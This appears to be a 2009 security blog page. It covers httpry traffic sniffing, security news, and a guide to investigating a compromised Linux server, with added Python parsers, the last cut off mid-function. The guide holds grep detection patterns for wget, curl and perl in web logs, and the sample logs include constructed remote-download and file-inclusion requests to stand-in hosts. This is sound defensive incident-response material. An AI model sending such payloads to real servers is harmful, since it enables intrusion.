build doc format.c httpry.1 Makefile methods.h README tcp.h utility.c
config.h error.h format.h httpry.c methods.c rc.httpry scripts test utility.h
root@zaha-desktop:~/httpry-0.1.5#



Before building, read the README for installation and usage instructions:
root@zaha-desktop:~/httpry-0.1.5# less README
root@zaha-desktop:~/httpry-0.1.5#


After reading the documentation, build and install it:
root@zaha-desktop:~/httpry-0.1.5# make
gcc -Wall -O3 -funroll-loops -I/usr/include/pcap -I/usr/local/include/pcap -o httpry httpry.c format.c methods.c utility.c -lpcap
root@zaha-desktop:~/httpry-0.1.5# make install
--------------------------------------------------
Installing httpry into /usr/sbin/
You can move the Perl scripts and other tools to
a location of your choosing manually
--------------------------------------------------
cp -f httpry /usr/sbin/
cp -f httpry.1 /usr/man/man1/ || cp -f httpry.1 /usr/local/man/man1/
root@zaha-desktop:~/httpry-0.1.5#



Running httpry (httpry -h shows you how to use it):
root@zaha-desktop:~# httpry -i eth0 -o /home/zahar/zahar.txt
httpry version 0.1.5 -- HTTP logging and information retrieval tool
Copyright (c) 2005-2009 Jason Bittel
Starting capture on eth0 interface
Writing output to file: /home/zahar/zahar.txt
^CCaught SIGINT, shutting down...
216 packets received, 0 packets dropped, 40 http packets parsed
563.5 packets/min, 104.3 http packets/min
root@zaha-desktop:~#



When you open that file, you can see the HTTP traffic of the websites you have visited:
root@zaha-desktop:~# cd /home/zahar/
root@zaha-desktop:/home/zahar# ls
zahar.txt
root@zaha-desktop:/home/zahar# cat zahar.txt
# httpry version 0.1.5
# Fields: timestamp,source-ip,dest-ip,direction,method,host,request-uri,http-version,status-code,reason-phrase
2009-10-09 23:07:07 69.63.176.193 192.168.1.2 < - - - HTTP/1.1 200 OK
2009-10-09 23:07:07 192.168.1.2 69.63.176.193 > GET 0.channel33.facebook.com /x/2319999860/false/p_1560360253=1 HTTP/1.1 - -
2009-10-09 23:07:16 192.168.1.2 74.125.153.95 > GET ajax.googleapis.com /ajax/services/search/web?v=1.0&rsz=large&q=http%3A%2F%2Fwww.lifedork.net%2F HTTP/1.1 - -
2009-10-09 23:07:16 74.125.153.95 192.168.1.2 < - - - HTTP/1.1 200 OK
2009-10-09 23:07:17 192.168.1.2 174.120.81.182 > GET www.lifedork.net / HTTP/1.1 - -
2009-10-09 23:07:17 174.120.81.182 192.168.1.2 < - - - HTTP/1.1 200 OK
2009-10-09 23:07:18 192.168.1.2 72.21.91.20 > GET resources.infolinks.com /js/infolinks_main.js HTTP/1.1 - -
2009-10-09 23:07:19 72.21.91.20 192.168.1.2 < - - - HTTP/1.1 304 Not Modified
2009-10-09 23:07:19 192.168.1.2 72.14.203.101 > GET www.google-analytics.com /__utm.gif?utmwv=4.5.7&utmn=84770406&utmhn=www.lifedork.net&utmcs=UTF-8&utmsr=1024x768&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.0%20r32&utmdt=Lifedork%20-%20still%20geeX%20%3F%20still%20suX%20!&utmhid=1381620066&utmr=-&utmp=%2F&utmac=UA-2655140-3&utmcc=__utma%3D41342143.642009118.1255096268.1255096268.1255099260.2%3B%2B__utmz%3D41342143.1255096273.1.1.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3Dusing%2520Backtrack%25204%2520SQL%2520injection%3B HTTP/1.1 - -
2009-10-09 23:07:19 72.14.203.101 192.168.1.2 < - - - HTTP/1.1 200 OK
2009-10-09 23:07:19 192.168.1.2 76.74.254.120 > GET stats.wordpress.com /g.gif?host=www.lifedork.net&rand=0.41899971236858347&blog=1730697&v=ext&post=0&ref= HTTP/1.1 - -
2009-10-09 23:07:19 192.168.1.2 174.120.81.182 > GET www.lifedork.net /page/2 HTTP/1.1 - -
2009-10-09 23:07:19 192.168.1.2 67.202.0.15 > GET router.infolinks.com /gsd/1255100950684?callback=resourcesCallback&pid=15399&wsid=0&pdom=www.lifedork.net HTTP/1.1 - -
2009-10-09 23:07:19 76.74.254.120 192.168.1.2 < - - - HTTP/1.1 200 OK
2009-10-09 23:07:20 67.202.0.15 192.168.1.2 < - - - HTTP/1.1 200 OK
2009-10-09 23:07:20 192.168.1.2 72.21.91.20 > GET resources.infolinks.com /flash/request_manager_i18n.swf HTTP/1.1 - -
2009-10-09 23:07:20 192.168.1.2 58.27.186.106 > GET b.scorecardresearch.com /b?c1=8&c2=6416591&rn=0.4555189644582066&c7=http%3A%2F%2Fwww.lifedork.net%2F&c3=3113409433781933211&c4=&c5=&c6=&c15=&c16=&c8=Lifedork%20-%20still%20geeX%20%3F%20still%20suX%20!&c9=&cv=1.6 HTTP/1.1 - -
2009-10-09 23:07:20 174.120.81.182 192.168.1.2 < - - - HTTP/1.1 200 OK
2009-10-09 23:07:20 58.27.186.106 192.168.1.2 < - - - HTTP/1.1 204 No Content



I'm not an expert in analysis; I hope you all can test this tool.
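As a starting point for the "later analysis" the httpry description mentions, here is an added Python parser for the log format shown above (httpry itself ships Perl tools for this in scripts/; this is not one of them). httpry writes one tab-separated record per line after a "# Fields:" comment naming the columns, with "-" for fields that do not apply; the sample records and the watch-list of download extensions below are constructed for this example.

```python
"""Parse httpry's tab-separated log and summarize it (added example).

Not part of httpry. The header line '# Fields: ...' names the columns;
'-' marks a field that does not apply, e.g. method and host on a response
record. The sample log below is constructed to match the 0.1.5 format.
"""
from collections import Counter
from typing import Dict, List, Optional, Tuple

Record = Dict[str, Optional[str]]

SAMPLE_LOG = "\n".join([
    "# httpry version 0.1.5",
    "# Fields: timestamp,source-ip,dest-ip,direction,method,host,request-uri,"
    "http-version,status-code,reason-phrase",
    "\t".join(["2009-10-09 23:07:17", "192.168.1.2", "174.120.81.182", ">", "GET",
               "www.lifedork.net", "/", "HTTP/1.1", "-", "-"]),
    "\t".join(["2009-10-09 23:07:17", "174.120.81.182", "192.168.1.2", "<", "-",
               "-", "-", "HTTP/1.1", "200", "OK"]),
    "\t".join(["2009-10-09 23:07:18", "192.168.1.2", "72.21.91.20", ">", "GET",
               "resources.infolinks.com", "/js/infolinks_main.js", "HTTP/1.1", "-", "-"]),
    "\t".join(["2009-10-09 23:07:19", "72.21.91.20", "192.168.1.2", "<", "-",
               "-", "-", "HTTP/1.1", "304", "Not Modified"]),
    "\t".join(["2009-10-09 23:07:20", "192.168.1.2", "10.0.0.9", ">", "GET",
               "updates.example.invalid", "/tools/setup.exe", "HTTP/1.1", "-", "-"]),
    "\t".join(["2009-10-09 23:07:21", "10.0.0.9", "192.168.1.2", "<", "-",
               "-", "-", "HTTP/1.1", "200", "OK"]),
])

# Assumed watch-list for the "dangerous downloaded files" use case.
RISKY_SUFFIXES = (".exe", ".scr", ".bat", ".msi", ".vbs", ".jar")


def parse_httpry(text: str) -> List[Record]:
    """Turn the log into dicts keyed by the names from the '# Fields:' header."""
    fields: Optional[List[str]] = None
    records: List[Record] = []
    for line in text.splitlines():
        if line.startswith("# Fields:"):
            fields = line.split(":", 1)[1].strip().split(",")
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data record before '# Fields:' header")
        values = line.split("\t")
        if len(values) != len(fields):
            continue  # skip a malformed record rather than abort the whole file
        records.append({k: (None if v == "-" else v) for k, v in zip(fields, values)})
    return records


def summarize(records: List[Record]) -> Dict[str, object]:
    """Counts of requests, responses, requested hosts and response status codes."""
    requests = [r for r in records if r["direction"] == ">"]
    responses = [r for r in records if r["direction"] == "<"]
    return {
        "requests": len(requests),
        "responses": len(responses),
        "hosts": Counter(r["host"] for r in requests),
        "status_codes": Counter(r["status-code"] for r in responses),
    }


def flag_risky_downloads(records: List[Record]) -> List[Tuple[str, str, str, str]]:
    """Requests whose path (query string ignored) ends in a watch-listed extension."""
    hits = []
    for r in records:
        uri = r.get("request-uri") or ""
        path = uri.split("?", 1)[0].lower()
        if r["direction"] == ">" and path.endswith(RISKY_SUFFIXES):
            hits.append((r["timestamp"], r["source-ip"], r["host"], uri))
    return hits


if __name__ == "__main__":
    recs = parse_httpry(SAMPLE_LOG)
    print(summarize(recs))
    for hit in flag_risky_downloads(recs):
        print("risky download:", hit)
```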

Thursday, October 08, 2009

Operation Phish Phry hooks 100 in U.S. and Egypt

Computerworld - More than 50 people in Southern California, Las Vegas and Charlotte, N.C., were indicted by a grand jury in Los Angeles for scheming to steal bank account information from thousands of people in the U.S. using phishing techniques.

U.S. authorities today arrested 33 of those named in the indictments and are on the lookout for the other 20.

In addition, authorities in Egypt charged another 47 co-conspirators in connection with the same scheme, bringing the total number of people charged to 100 -- the largest number of defendants ever charged for the same cybercrime, according to the FBI.

The indictments stem from a two-year operation dubbed "Phish Phry," which involved the FBI, the U.S. Attorney's Office, the Electronic Crimes Task Force in Los Angeles and Egyptian law enforcement authorities.

The arrests were announced in Los Angeles by Keith Bolcar, acting assistant director in charge of the FBI in Los Angeles, George Cardona, acting U.S. Attorney in Los Angeles, and Egyptian law enforcement authorities.

The 51-count indictment, which was unsealed today, charged all of the defendants with conspiracy to commit wire fraud and bank fraud. Some of those named were also charged with aggravated identity theft, unauthorized access to protected computers and money laundering.

Phishing is a form of social engineering in which attackers send e-mails made to look like legitimate correspondence from reputable institutions such as banks. Victims are directed to Web sites that look authentic but are actually fakes. Once there, they are asked to enter information that can later be used to break into accounts or to commit identity theft.

According to the indictment, hackers in Egypt used phishing techniques to obtain bank account numbers and related personal data from thousands of bank customers in the U.S. The information was then used to break into customer accounts at two U.S. banks, Bank of America and Wells Fargo.

The Egyptian hackers then recruited individuals in the U.S. to help transfer funds from the compromised accounts to newly created accounts. The U.S. part of the crime ring was allegedly managed by Kenneth Lucas, Nichole Merzi and Jonathan Clark, all of whom are residents of California, the FBI said in statement.

The three individuals are alleged to have directed associates to recruit "runners" to establish bank accounts to which funds stolen from the compromised accounts could be transferred. A portion of the funds was wired to the conspirators in Egypt.

The alleged conspirators typically withdrew amounts ranging from a few hundred dollars to more than $2,000 from compromised bank accounts and then transferred the money into the new accounts.

"The sophistication with which Phish Phry defendants operated represents an evolving and troubling paradigm in the way identity theft is now committed," Bolcar said in a statement. The operations of the group had a significant impact on the operations of two banks and caused "huge headaches" for the victims, the statement added.

All of the individuals charged in the U.S. face prison terms of up to 20 years if they are convicted.

John Harrison, a group product manager for security vendor Symantec Corp. said the arrests highlight the truly global nature of phishing operations. Despite heightened awareness of the problem, phishing schemes continue to thrive on the Internet, he said.

Last year, Symantec counted more than 55,000 phishing sites. That figure represented an increase of more than 60% from 2007 levels, Harrison said. The growing availability of sophisticated phishing tool kits is adding to the problem by making it much simpler for would-be phishers to create spoofed Web sites that can be used to trick victims into parting with confidential information, he said.

Static Binary Analysis of Recent SMBv2 Vulnerability

The recent SMBv2 vulnerability (CVE-2009-3103) in Microsoft Windows has gotten a lot of attention in the past few weeks. We decided that given the publicity and nature of the vulnerability, it would be interesting to post a threat analysis. With the release of Stephen Fewer's Metasploit module to exploit this vulnerability, technical details of the vulnerability are now publicly available.

Details: http://www.secureworks.com/research/threats/windows-0day/?threat=windows-0day

Sunday, October 04, 2009

File Carving and File Recovery with DiskDigger

DiskDigger is a tool that allows you to recover deleted files from a FAT or NTFS drive. It has two modes of operation. In the first it merely looks in the FAT/MFT for files marked as deleted, in much the same way that the tool called Restoration does. In the second it carves down the drive, looking at the raw bits for the known headers and footers of various file types, much like PhotoRec. While PhotoRec seems a little more powerful, DiskDigger is easier to use and its preview functionality is quite nice. This video covers the basics of recovering deleted files with DiskDigger.

See this video:
http://www.irongeek.com/videos/file-carving-and-file-recovery-with-diskdigger.swf

Saturday, October 03, 2009

FOSS.my 2009 (24-25 October 2009)

FOSS.my 2009 is Malaysia’s premier Free and Open Source Software (FOSS) event. FOSS.my 2009 is the second such conference; the aim is for it to be an annual event bringing together professionals and enthusiasts from Malaysia, Singapore, Asia and the rest of the world for a two-day, grassroots-driven FOSS conference.
http://foss.my/2009/schedule/

Monday, September 14, 2009

NSMnow – 1.5.0

The NSMnow 1.5 series brings the initial complete feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use or test an NSM configuration for themselves but were daunted by the process of doing it from scratch.

As this is the initial release with support for Fedora, RHEL and CentOS systems, there are bound to be some teething problems. As long as you submit bug reports, they will be fixed and NSMnow will continue to get even better, if that’s possible.

Download: http://www.securixlive.com/nsmnow/download.php

iPhone anti-phishing sigs only slightly delayed

A number of security experts initially criticized Apple's latest security feature for the iPhone, only to find -- 24 hours later -- that the issues were mostly moot.

On Thursday, Apple highlighted the anti-phishing features of its popular mobile device, the iPhone, at a San Francisco product launch event. However, several security experts tested the feature only to find that phishing sites blocked by desktop Safari were still loaded by the iPhone's mobile browser. Yet, by Friday, the issue appeared to have been mostly fixed.

It's likely that the lists of sites to be blocked had to be updated by Apple, and that took time, said Michael Sutton, vice president of security research for Web security firm Zscaler.

"Over time, more sites are being blocked," Sutton said. "The issue is likely not the blocking, but the updates."

On Saturday, Apple confirmed that updates to the iPhone are not necessarily in real time.

"Safari's anti-phishing database is downloaded while the user charges their phone in order to protect battery life and ensure there aren't any additional data fees," the company said in a statement sent to SecurityFocus. "After updating to iPhone OS 3.1 the user should launch Safari, connect to a Wi-Fi network and charge their iPhone with the screen off. For most users this process should happen automatically when they charge their phone."

Sutton commended Apple for its attention to security on the iPhone.

"If you look at mobile phones, they have very little security," he said. "So it's good that Apple has taken this step."

From:SecurityFocus

Sunday, September 13, 2009

Hack In The Box Security Conference 2009 - Malaysia

Date: 5-8 October 2009
Venue: Crowne Plaza Mutiara Kuala Lumpur, Jalan Sultan Ismail, 50250 Kuala Lumpur

HITBSecConf is the premier network security event in Asia and the Middle East. The main aim of the conference is to enable the dissemination, discussion and sharing of in-depth network security knowledge.

You can see details here:
http://conference.hitb.org/hitbsecconf2009kl/

Thursday, September 10, 2009

Hackers already exploiting IIS flaws

Microsoft has revealed that hackers are already exploiting newly disclosed vulnerabilities in its Internet Information Services (IIS) web server software.

Exploit code for the first flaw was posted on Monday, allowing hackers to remotely take control of an IIS 5.0 server. New code was then posted on Thursday which takes advantage of vulnerabilities in IIS 5.0, IIS 5.1, IIS 6.0 and IIS 7.0 to allow hackers to launch denial-of-service attacks against these systems, as long as they are running the FTP Service, said Microsoft.

The company was forced to update its security advisory warning that it is now seeing "limited attacks that use this exploit code".

"Microsoft is actively monitoring this situation to keep customers informed and to provide guidance as necessary," the advisory continued.

Microsoft is due to release its September security updates on Tuesday next week, but it is widely believed that the new vulnerabilities were disclosed too recently for the Microsoft security team to deliver a working fix.

Microsoft blamed the current, albeit limited, attacks on the fact that the original vulnerabilities were published on the internet before the firm had a chance to work on a resolution.

"We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests," said the firm in a blog post.

"This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed."

How to Investigate a compromised Linux Server

This article will assist you with a preliminary investigation of a server compromise. If the server appears to have been compromised at the root level, the server is to be considered compromised until it is rebuilt. This is not to say that you have to rebuild just because an intruder gained access to an unprivileged account. Either way you must identify how the server was compromised, so that the hole can be closed.

Note: Don't get distracted by what you find; focus on gathering as much information as possible before disturbing the environment. Keep in mind that every command below runs with the binaries on the suspect host: a rootkit may have replaced ps, netstat, ls or lsof, so where possible use statically linked known-good copies from read-only media and treat any output from the host's own tools as a lead, not as proof.
Identify Who is on the Server

Look for suspicious logins. If the customer always logs in from a DSL line in California and then suddenly logs in from Japan, you may want to make note of that.

#w && echo "netstat listing" && netstat -nalp |grep ":22 "
#last -a
#zgrep ssh /var/log/secure* |grep Accept
#zgrep ftp /var/log/secure* |grep Accept
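As an added example (not part of the original article), the following Python script does the same triage as the last and zgrep commands above, over a few constructed /var/log/secure lines: it extracts every successful SSH login and flags the ones coming from a source the user is not known to log in from. The baseline dictionary (the deploy user always logging in from 76.102.14.9) is an assumption standing in for the "DSL line in California" case; on a real server you would feed it the output of zcat /var/log/secure* and a baseline taken from the customer, and run it on a copy of the logs rather than trusting what is still on the host.

```python
import re
from collections import defaultdict

# Constructed sample of sshd lines in /var/log/secure format (not taken from the page).
SAMPLE_SECURE_LOG = """\
Sep 10 08:01:12 web1 sshd[2231]: Accepted publickey for deploy from 76.102.14.9 port 51022 ssh2
Sep 10 09:17:44 web1 sshd[2410]: Accepted password for deploy from 76.102.14.9 port 51100 ssh2
Sep 10 22:03:05 web1 sshd[3011]: Failed password for root from 203.0.113.77 port 40221 ssh2
Sep 10 22:03:09 web1 sshd[3011]: Accepted password for root from 203.0.113.77 port 40221 ssh2
Sep 11 02:44:51 web1 sshd[3190]: Accepted password for deploy from 203.0.113.77 port 40310 ssh2
"""

# Matches the "Accepted <method> for <user> from <ip> port <n>" lines that the
# page's `zgrep ssh /var/log/secure* | grep Accept` pulls out.
ACCEPT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port \d+"
)


def accepted_logins(log_text):
    """Return [(timestamp, user, source_ip, auth_method)] for every successful SSH login."""
    logins = []
    for line in log_text.splitlines():
        m = ACCEPT_RE.match(line)
        if m:
            logins.append((m["ts"], m["user"], m["src"], m["method"]))
    return logins


def new_sources(logins, known):
    """known maps user -> set of source IPs that user normally logs in from (assumed baseline).
    Returns the logins whose source is not in that set; a user with no baseline at all
    (root here) is flagged on every login."""
    return [entry for entry in logins if entry[2] not in known.get(entry[1], set())]


def logins_by_user_source(logins):
    """Count logins per (user, source) pair, the equivalent of sort | uniq -c on the grep output."""
    counts = defaultdict(int)
    for _, user, src, _ in logins:
        counts[(user, src)] += 1
    return dict(counts)


if __name__ == "__main__":
    logins = accepted_logins(SAMPLE_SECURE_LOG)
    baseline = {"deploy": {"76.102.14.9"}}   # assumed: the customer's usual DSL address
    for (user, src), n in sorted(logins_by_user_source(logins).items()):
        print(f"{n:3d} {user:10s} {src}")
    for ts, user, src, method in new_sources(logins, baseline):
        print(f"UNEXPECTED: {ts} {user} from {src} ({method})")
```

Successful logins for a user that never has a baseline (root) are always reported, which is what you want: direct root logins over SSH from the Internet should not be happening on a customer box in the first place.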


Identify current network activity:
#netstat -nalp

View IP Connection Count
The following command will tell you how many connections are being made to the web server on port 80. Replacing :80 with the port of your application will show the number of connections associated with any service. The cut -f1 -d: step keeps everything before the first colon, which is only right for plain IPv4 addresses; when the server listens on IPv6, IPv4 clients show up as IPv4-mapped addresses such as ::ffff:1.2.3.4:80, where the address is the fourth colon-separated field, so replace cut -f1 -d: with cut -f4 -d: (native IPv6 addresses still will not split cleanly this way). Note that the continuation lines must not start with #, or the shell treats the rest of the pipeline as a comment.
#netstat -plant | awk '$4 ~ /:80$/ {print $5}' | \
cut -f1 -d: | \
sort | uniq -c | sort -n
1 0.0.0.0
1 127.0.0.1
1 149.254.192.205
1 151.65.171.19
1 165.155.200.87
1 173.66.139.70
1 195.93.21.97
1 60.48.171.251
1 60.53.227.174
1 72.30.142.83
1 75.101.147.30
1 79.7.248.51
1 82.206.136.38
1 83.229.112.20
1 96.231.93.237
2 202.133.102.242
2 41.210.38.158
2 86.16.94.89
3 208.54.94.9
5 41.210.17.188
5 41.210.35.165
5 66.150.96.121
5 83.87.69.25
9 68.191.207.0
11 65.49.2.92


What is the state of the current connections?
#netstat -plant | \
awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
13 FIN_WAIT2
53 LISTEN
129 TIME_WAIT
316 ESTABLISHED
754 CLOSE_WAIT


Type, and process name:
#netstat -plant | \
awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' | \
sort | uniq -c | sort -n | tail
1 LISTEN xinetd
2 LISTEN memcached
2 LISTEN slapd
2 LISTEN smbd
2 TIME_WAIT
3 LISTEN httpd
3 SYN_SENT firefox
9 ESTABLISHED httpd
11 ESTABLISHED firefox
46 ESTABLISHED slapd


List Open Files
In Linux everything is a file, including network connections:
#lsof -i -n

To show numeric port numbers instead of service names:
#lsof -nPi

What Processes are Running?
#ps -elf
#ls /proc/*/exe -la


Unhide
Sometimes processes hide themselves well enough that our shell commands will not pick them up. In these cases I use unhide:
http://www.security-projects.com/?Unhide
Compile Unhide (ideally on a clean machine, then copy the binaries over; the compiler and libraries on the suspect host cannot be trusted):
$ wget http://www.security-projects.com/unhide20080519.tgz
$ tar xzf unhide20080519.tgz
$ cd unhide-20080519/
$ cc unhide-tcp.c -o unhide-tcp
$ chmod o+x unhide-tcp
$ cc unhide-linux26.c -o unhide
$ chmod o+x unhide
# mv unhide* /usr/sbin

Using Unhide:
# unhide-tcp
Unhide 20080519
yjesus@security-projects.com

Starting TCP checking

Starting UDP checking

# unhide proc
Unhide 20080519
yjesus@security-projects.com

[*]Searching for Hidden processes through /proc scanning

Found HIDDEN PID: 740
Command:

Found HIDDEN PID: 775
Command:

Found HIDDEN PID: 1004
Command:

Found HIDDEN PID: 2996
Command:

Found HIDDEN PID: 26921
Command: ./123qwelb

Found HIDDEN PID: 27109
Command: ./123qwelb

Found HIDDEN PID: 27213
Command: ./123qwelb

Found HIDDEN PID: 27216
Command: ./123qwelb

Found HIDDEN PID: 27284
Command: top
Treat hidden PIDs with an empty Command with caution: they are frequently processes that exited between unhide's scans rather than genuinely hidden ones. The entries that point at a binary run from a relative path (./123qwelb above) are the real finding; note its working directory from /proc/PID/cwd and preserve the file before anything else.


Check Binary Files

Often malicious users will replace system binaries with modified copies that leave back doors for the attacker to use in the event that the original vector of attack is corrected.

The strings command prints the printable text embedded in a binary. Comparing its output against the same binary on a known-good server is a crude but useful check: unexpected paths, hostnames, IP addresses or a second program embedded in the file are strong hints that it was replaced. Where the package manager's database is still intact, rpm -Va (or debsums on Debian) is a faster first pass, but remember that an attacker with root may have altered that database too.

Compare the output of the following command with that of a known good server:
#strings /usr/bin/top

Investigate Process Activity

To see what a process is doing, run the following command, replacing $PID with the actual process ID:
#strace -p $PID

DESCRIPTION

In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.

The -p flag allows you to attach strace to an already running process.
Suspicious Files

Are suspicious files located in the world-writable directories?

The next thing you want to look at are the directories that are world-writable. More often than not, the intruder is not a person at all, but a worm spreading through the Internet. Many attacks will store a binary or will leave behind other temporary files. The three most common directories to search are /tmp, /var/tmp, and /dev/shm.

#ls /tmp -lab
#ls /var/tmp -lab
#ls /dev/shm -lab

Many times you will find that the worm/intruder hides subdirectories behind names that are hard to type or that look like . and .. in a listing (a name made of spaces, a trailing space after .., runs of dots). Using the tab key for auto-completion often helps, and the -b flag used above makes ls print spaces and control characters as escape sequences instead of silently. Here are some examples of what to look for:
root:~# ls -la
total 2
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32
drwxr-xr-x 5 nobody nobody 120 2005-11-25 18:32 .
drwxr-xr-x 33 nobody nobody 2320 2005-11-25 18:31 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:31 ...
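The listing above is meant to be read by eye, which is exactly what such names are chosen to defeat. As an added example (not from the original article), this Python script scans a directory such as /tmp or /dev/shm and flags entries whose names are only dots, carry leading or trailing whitespace, or contain control characters. The build_demo_dir helper creates a temporary directory with constructed names of that kind so the script runs offline; on a real host call suspicious_entries("/tmp") and friends directly.

```python
import os
import tempfile


def flag_name(name):
    """Return a short reason if a directory entry name looks chosen to hide, else None."""
    if name != name.strip():
        return "leading or trailing whitespace"
    if name.strip(".") == "":          # '...', '....' and so on; '.' and '..' never reach us
        return "name made only of dots"
    if any(ord(c) < 32 or ord(c) == 127 for c in name):
        return "control character in name"
    return None


def suspicious_entries(path):
    """Scan one directory (e.g. /tmp, /var/tmp, /dev/shm) and return sorted [(repr(name), reason)].
    repr() is used so a name like '.. ' is shown with its quotes and escapes, as ls -b would."""
    found = []
    with os.scandir(path) as entries:
        for entry in entries:
            reason = flag_name(entry.name)
            if reason:
                found.append((repr(entry.name), reason))
    return sorted(found)


def build_demo_dir():
    """Constructed demo data: creates the kinds of names an intruder uses, in a temp dir."""
    root = tempfile.mkdtemp(prefix="hidden-demo-")
    for name in ["...", ".. ", " ", ".\x01x", "normal.txt", ".config"]:
        os.mkdir(os.path.join(root, name))
    return root


if __name__ == "__main__":
    demo = build_demo_dir()
    for shown, why in suspicious_entries(demo):
        print(f"{shown:12} {why}")
```

Whitespace and dot-only names are legal on Linux, so the file system will not stop anyone from creating them; ordinary dot-files such as .config are deliberately not flagged, because they are normal in home directories and a noisy check gets ignored.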

Point(s) of Entry

Simply cleaning a server will not prevent a future compromise. We need to help the customer identify the point of entry to protect the customer, and our network.

Many times vulnerable web scripts (PHP, Perl, etc.) are exploited and commands are then executed on the server as the web user. Use grep to search the Apache logs for some common commands that intruders often pass in the query string.

You will want to use different commands depending on which control panel software the server is running.

No control panel
for i in `locate access_log` ;
do
echo $i ; egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' $i ;
done

locate only knows about files that existed when updatedb last ran, so a recently created log can be missed; look in the customer's VirtualHost container (the CustomLog directive) to ascertain the real name of the log file.

cPanel
The following command checks whether any system functions were called through the web server:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /usr/local/apache/logs/*
The next command finds requests that carry a URL in the request line (typical of remote file inclusion, and of some XSS payloads) and keeps only those the server answered with a 2xx or 3xx status, i.e. requests that succeeded:
awk '$7 ~ /http/ {print}' /usr/local/apache/domlogs/*/access_log | awk '$9 ~ /^[23]/ {print}'

Ensim
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /home/virtual/site*/fst/var/log/httpd/*

Plesk
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/*/statistics/logs/*

On servers with a large number of sites, running the previous command will give you an "argument list too long" error. Try this instead:
for i in `ls /var/www/vhosts`; do
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/$i/statistics/logs/access_*log 2>/dev/null;
done;


Default Apache log directory on Red Hat-style systems:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/log/httpd/*


To locate URL-carrying requests (remote file inclusion or XSS attempts) try:
awk '$7 ~ /http/ {print}' /var/www/vhosts/*/statistics/logs/access_*log | awk '$9 ~ /^[23]/ {print}'

This command searches the URI field for the text http. URIs with a protocol identifier in them often indicate a remote file inclusion or XSS attack. However some applications, WordPress among others, legitimately pass URLs in parameters and will produce false positives. Additionally this command only returns results for requests with a 2xx or 3xx reply code, indicating a request the web server actually served; the status test is anchored with ^ because a bare /[2-3]/ would also match 403, 423 and similar codes that merely contain a 2 or 3.

Reminders
Keep in mind that not all results mean the server has been compromised; it takes some interpreting. You want to look for obvious things such as calls to wget to download a file, or a call to perl that looks out of place. You may come up with some false positives, so using grep to cut 404s and 400s out may be a good idea. You can do this by tacking a "| grep -v 404" on to the end of any of those commands, bearing in mind that it drops any line containing 404 anywhere (in the byte count, say); where precision matters, test the status field with awk as above.
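The egrep and awk one-liners above each look for one thing and leave the status filtering to a trailing grep -v. As an added example (not from the original article), this Python script runs the same checks over constructed Apache combined-format log lines in one pass: the page's command-marker pattern, the URL-in-URI test, and, as extensions of my own, a directory-traversal and a script-tag test; it then keeps only requests the server answered with a 2xx or 3xx status. The sample lines, hosts and paths are made up for the demonstration and include the WordPress redirect false positive the text warns about.

```python
import re

# Constructed Apache combined-format log lines (not taken from the page).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Sep/2009:02:11:09 +0800] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Sep/2009:02:11:40 +0800] "GET /cmd.php?c=wget%20http://198.51.100.9/x.txt HTTP/1.1" 200 118 "-" "libwww-perl/5.8"
203.0.113.5 - - [10/Sep/2009:02:11:52 +0800] "GET /cmd.php?c=chmod%20%2bx%20x.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.8"
198.51.100.22 - - [10/Sep/2009:03:02:14 +0800] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.10 - - [10/Sep/2009:03:05:00 +0800] "GET /wp-login.php?redirect_to=http://www.example.com/wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Sep/2009:03:06:31 +0800] "GET /?s=<script>alert(1)</script> HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
192.0.2.12 - - [10/Sep/2009:03:07:00 +0800] "GET /about/ HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "request line", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

# The page's egrep pattern, plus '+' as an alternative encoding of the space.
CMD_RE = re.compile(r'(chr\(|system\()|(wget|curl|perl|gcc|chmod)(%20|\+)', re.I)
# A parameter whose value starts with a URL: the page's awk '$7 ~ /http/' test, narrowed.
INCLUDE_RE = re.compile(r'=(https?|ftp)(://|%3a%2f%2f)', re.I)
# My own additions: directory traversal and a script tag in the query string.
TRAVERSAL_RE = re.compile(r'(\.\./|%2e%2e%2f|\.\.%2f)', re.I)
SCRIPT_RE = re.compile(r'(<script|%3cscript)', re.I)

CHECKS = [("command", CMD_RE), ("remote-url", INCLUDE_RE),
          ("traversal", TRAVERSAL_RE), ("xss", SCRIPT_RE)]


def parse_access_log(text):
    """Return one dict per parseable log line; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
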